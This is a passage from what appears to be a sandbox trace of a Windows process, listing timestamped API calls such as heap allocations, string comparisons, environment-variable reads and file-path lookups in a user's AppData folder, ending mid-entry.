GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/m3JGHdzSozsPviDT.jpg", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\m3JGHdzSozsPviDT.jpg", lpFilePart=0x8cf650*="m3JGHdzSozsPviDT.jpg") returned 0x34 [0123.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0123.160] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\m3JGHdzSozsPviDT.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\m3jghdzsozspvidt.jpg")) returned 0xffffffff [0123.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0123.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0123.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0123.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0123.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0123.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0123.161] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0123.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0123.161] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0123.161] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0123.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0123.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0123.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0123.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0123.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0123.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0123.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0123.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0123.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0123.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0123.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0123.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0123.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0123.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Macromedia", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0123.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="acromedia", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0123.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cromedia", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0123.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="romedia", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0123.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="omedia", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0123.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="media", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0123.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0123.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0123.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0123.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0123.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0123.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0123.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0123.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0123.162] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0123.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0123.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0123.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0123.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0123.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0123.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0123.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0123.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0123.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0123.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0123.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0123.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0123.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0123.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0123.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0123.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0123.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0123.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0123.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f7200 [0123.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0123.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Macromedia", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0123.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="acromedia", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0123.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cromedia", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0123.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="romedia", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0123.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="omedia", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0123.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0123.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0123.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0123.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0123.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0123.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0123.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0123.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0123.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0123.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0123.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0123.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0123.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0123.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66f0 | out: hHeap=0x2af0000) returned 1 [0123.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0123.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0123.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0123.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0123.163] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0123.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0123.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0123.163] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0123.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0123.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0123.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0123.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0123.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0123.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0123.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0123.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0123.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0123.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0123.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0123.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0123.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0123.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0123.164] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0123.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0123.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0123.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0123.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0123.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0123.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0123.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0123.164] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0123.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0123.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0123.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0123.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0123.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0123.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0123.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0123.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0123.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0123.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0123.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0123.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0123.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0123.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0123.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0123.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0123.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0123.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0123.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0123.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b08 [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0123.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0123.165] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0123.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0123.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0123.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0123.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0123.166] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0123.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0123.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0123.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0123.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0123.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0123.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0123.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0123.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0123.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0123.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0123.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0123.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0123.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0123.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0123.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0123.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0123.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0123.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0123.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0123.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0123.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0123.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0123.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0123.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0123.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ab8 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0123.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719a8 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0123.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0123.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0123.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0123.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0123.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0123.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0123.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0123.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0123.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0123.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0123.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0123.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0123.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0123.168] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0123.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0123.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0123.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0123.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0123.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0123.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0123.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0123.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0123.168] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0123.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0123.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0123.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 